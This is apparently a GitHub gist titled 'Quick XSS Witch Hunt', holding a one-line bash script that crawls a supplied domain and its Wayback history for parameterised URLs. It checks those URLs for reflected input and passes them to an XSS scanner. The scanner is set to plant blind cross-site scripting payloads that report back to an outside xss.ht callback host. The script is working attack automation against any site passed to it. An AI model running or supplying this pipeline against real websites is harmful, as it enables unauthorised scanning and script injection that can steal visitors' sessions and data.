Skip to content

Instantly share code, notes, and snippets.

@scumdestroy
Created April 5, 2022 07:36
Show Gist options
  • Save scumdestroy/e94142ffcc1c5e4d55411fc92960d808 to your computer and use it in GitHub Desktop.
Save scumdestroy/e94142ffcc1c5e4d55411fc92960d808 to your computer and use it in GitHub Desktop.
Quick XSS Witch Hunt
#/bin/bash
hakrawler -url "${1}" -plain -usewayback -wayback | grep "${1}" | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff
|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | kxss | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | dalfox pipe -b https://scumde
stroy.xss.ht
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment